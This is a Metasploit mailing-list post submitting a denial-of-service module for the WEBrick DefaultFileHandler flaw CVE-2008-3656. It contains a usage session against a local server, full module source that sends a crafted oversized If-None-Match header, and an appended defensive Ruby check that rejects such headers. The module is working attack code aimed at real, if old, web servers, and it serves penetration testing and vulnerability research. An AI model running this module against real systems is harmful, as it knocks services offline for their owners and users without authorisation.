Hey guys,

I've attached a new DoS module for the WEBrick vulnerability[1]
(WEBrick::HTTP::DefaultFileHandler) which causes massive CPU consumption.

I ran this simple server (like the one here[2]):


require 'webrick'
WEBrick::HTTPServer.new(:Port => 3333, :DocumentRoot => ".").start


in my metasploit SVN checkout, and then ran this:


msf > use dos/webrick_regex
msf auxiliary(webrick_regex) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(webrick_regex) > set RPORT 3333
RPORT => 3333
msf auxiliary(webrick_regex) > set URI /README
URI => /README
msf auxiliary(webrick_regex) > run
[*] Request sent to 127.0.0.1:3333
[*] Auxiliary module execution completed


And watched my CPU usage go through the roof until I killed the server.


msf auxiliary(webrick_regex) > info

       Name: Ruby WEBrick::HTTP::DefaultFileHandler DoS
    Version: 1

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        Use a proxy chain
  RHOST    127.0.0.1        yes       The target address
  RPORT    3333             yes       The target port
  SSL      false            no        Use SSL
  URI      /README          yes       URI to request
  VHOST                     no        HTTP server virtual host

Description:
  The WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and
  earlier, 1.8.6 to 1.8.6-p286, 1.8.7 to 1.8.7-p71, and 1.9 to r18423
  allows for a DoS (CPU consumption) via a crafted HTTP request.


Thanks,
Kris Katterjohn

[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3656
[2] http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::HttpClient

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',
                        'Description'    => %q{
                                The WEBrick::HTTP::DefaultFileHandler in WEBrick in
                                Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7
                                to 1.8.7-p71, and 1.9 to r18423 allows for a DoS
                                (CPU consumption) via a crafted HTTP request.
                        },
                        'Author'         => 'Kris Katterjohn <[EMAIL PROTECTED]>',
                        'License'        => MSF_LICENSE,
                        'Version'        => '1',
                        'References'     => [
                                [ 'BID', '30644'],
                                [ 'CVE', '2008-3656'],
                                [ 'URL', 'http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/']
                        ],
                        'DisclosureDate' => 'Aug 08 2008'))

                register_options([
                        OptString.new('URI', [ true, 'URI to request', '/' ])
                ])
        end

        def run
                begin
                        # A single request carrying an oversized If-None-Match
                        # header is what drives the CPU consumption (CVE-2008-3656).
                        o = {
                                'uri' => datastore['URI'] || '/',
                                'headers' => {
                                        'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
                                }
                        }

                        c = connect(o)
                        c.send_request(c.request_raw(o))

                        print_status("Request sent to #{rhost}:#{rport}")
                rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
                        print_status("Couldn't connect to #{rhost}:#{rport}")
                rescue ::Timeout::Error, ::Errno::EPIPE
                        # Ignored: a busy server may stall or drop the connection.
                end
        end
end
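
A defensive counterpart to the module above, added here as an example (it is not part of the module, of Metasploit, or of WEBrick): a linear-time check on the If-None-Match header that a reverse proxy, WAF rule, or WEBrick's :RequestCallback hook could apply before DefaultFileHandler parses the value. The size and tag-count limits are assumed thresholds chosen for illustration, and the sample requests are constructed.

```ruby
# Added defensive check, not part of the module above or of WEBrick itself.
# CVE-2008-3656 is reached through the If-None-Match header that
# DefaultFileHandler parses, so a front-end can refuse abusive values
# before the file handler ever sees them.
# Both limits are assumed thresholds chosen for illustration.
MAX_IF_NONE_MATCH_BYTES = 512   # a real conditional GET carries far less
MAX_ENTITY_TAGS         = 8     # browsers send one or a few entity tags

# Returns a reason string when the header value looks abusive, nil otherwise.
# Uses String#count rather than a regex so the check itself stays linear.
def suspicious_if_none_match?(value)
  return nil if value.nil? || value.strip.empty?
  if value.bytesize > MAX_IF_NONE_MATCH_BYTES
    return "If-None-Match too long (#{value.bytesize} bytes)"
  end
  quotes = value.count('"')
  return "unbalanced quotes in If-None-Match" if quotes.odd?
  tags = quotes / 2
  return "too many entity tags (#{tags})" if tags > MAX_ENTITY_TAGS
  nil
end

# Inspects a raw HTTP request head and returns [status, reason]:
# [400, reason] when the request should be refused, [nil, nil] otherwise.
def guard_request(raw)
  head  = raw.split(/\r?\n\r?\n/, 2).first.to_s
  lines = head.split(/\r?\n/)
  lines.drop(1).each do |line|           # skip the request line
    name, val = line.split(':', 2)
    next unless name && val && name.strip.downcase == 'if-none-match'
    reason = suspicious_if_none_match?(val.strip)
    return [400, reason] if reason
  end
  [nil, nil]
end

# Constructed sample requests: the header shape the module sends, and a
# normal conditional GET as a browser would issue it.
DOS_STYLE_REQUEST = "GET /README HTTP/1.1\r\nHost: 127.0.0.1:3333\r\n" \
                    "If-None-Match: " + %q{foo=""} + %q{bar="baz" } * 100 + "\r\n\r\n"
BENIGN_REQUEST    = "GET /README HTTP/1.1\r\nHost: 127.0.0.1:3333\r\n" \
                    "If-None-Match: W/\"1a2b\", \"3c4d\"\r\n\r\n"

if __FILE__ == $0
  [DOS_STYLE_REQUEST, BENIGN_REQUEST].each do |req|
    status, reason = guard_request(req)
    puts status ? "refused #{status}: #{reason}" : "passed"
  end
end
```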

_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers